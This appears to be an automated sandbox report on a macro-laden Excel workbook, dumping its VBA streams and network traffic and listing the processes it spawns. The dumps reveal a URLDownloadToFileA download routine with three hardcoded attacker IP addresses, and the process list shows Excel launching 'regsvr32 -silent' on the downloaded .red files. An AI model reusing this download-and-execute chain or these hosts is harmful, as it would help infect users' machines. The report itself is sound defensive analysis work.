      VBA File Name: ThisWorkbook, Stream Size: 2501
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2501
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      Option Explicit
      
      Private m_openAlreadyRan As Boolean
      Private m_isOpenDelayed As Boolean
      
      Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
      End Sub
      
      Private Sub asWorkbook_Activateas()
          On Error Resume Next
      
          If m_isOpenDelayed Then
              m_isOpenDelayed = False
              InitWorkbook
          End If
      End Sub
      
      Private Sub saWorkbook_Opensa()
          On Error Resume Next
      
      
      End Sub
      
      Private Sub ssaaInitWorkbookssaa()
          On Error Resume Next
      
          If VBA.Val(Application.Version) < 12 Then
              Me.Close False
              Exit Sub
          End If
          '
              'Other code
              '
              '
              '
      End Sub
      VBA File Name: UserForm2, Stream Size: 1182
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
      VBA File Name:UserForm2
      Stream Size:1182
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "UserForm2"
      Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = False
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.33231709703
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:101831
      Entropy:7.65479066874
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:662
      Entropy:5.27592988154
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
      Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTlk
      File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
      Stream Size:30
      Entropy:1.37215976263
      Base64 Encoded:False
      Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
      Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.43722878834
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:302
      Entropy:4.65399600072
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/f
      File Type:data
      Stream Size:226
      Entropy:3.01175231218
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
      Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
      Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/o
      File Type:data
      Stream Size:272
      Entropy:3.6318384866
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4332
      Entropy:4.42025024054
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2461
      Entropy:3.4974013905
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:1047
      Entropy:6.66117755603
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Snort IDS Alerts

      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      09/29/21-08:59:05.747980ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
      09/29/21-08:59:08.746802ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
      09/29/21-08:59:15.659776ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
      09/29/21-08:59:26.247443ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
      09/29/21-08:59:29.258176ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
      09/29/21-08:59:37.377441ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 29, 2021 08:59:04.147993088 CEST4916780192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:07.146630049 CEST4916780192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:13.168622017 CEST4916780192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:25.183976889 CEST4916880192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:28.192830086 CEST4916880192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:34.199345112 CEST4916880192.168.2.22190.14.37.178
      Sep 29, 2021 08:59:46.245610952 CEST4916980192.168.2.22185.183.96.67
      Sep 29, 2021 08:59:49.254662991 CEST4916980192.168.2.22185.183.96.67
      Sep 29, 2021 08:59:55.261293888 CEST4916980192.168.2.22185.183.96.67
      Sep 29, 2021 09:00:07.276683092 CEST4917080192.168.2.22185.183.96.67
      Sep 29, 2021 09:00:10.285356045 CEST4917080192.168.2.22185.183.96.67
      Sep 29, 2021 09:00:16.291901112 CEST4917080192.168.2.22185.183.96.67
      Sep 29, 2021 09:00:28.322717905 CEST4917180192.168.2.22185.250.148.213
      Sep 29, 2021 09:00:31.331659079 CEST4917180192.168.2.22185.250.148.213
      Sep 29, 2021 09:00:37.338440895 CEST4917180192.168.2.22185.250.148.213
      Sep 29, 2021 09:00:49.353007078 CEST4917280192.168.2.22185.250.148.213
      Sep 29, 2021 09:00:52.362315893 CEST4917280192.168.2.22185.250.148.213
      Sep 29, 2021 09:00:58.371913910 CEST4917280192.168.2.22185.250.148.213

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:08:58:21
      Start date:29/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13ff20000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:09:00:31
      Start date:29/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd.red
      Imagebase:0xff550000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:00:32
      Start date:29/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd1.red
      Imagebase:0xff550000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:00:32
      Start date:29/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd2.red
      Imagebase:0xff550000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >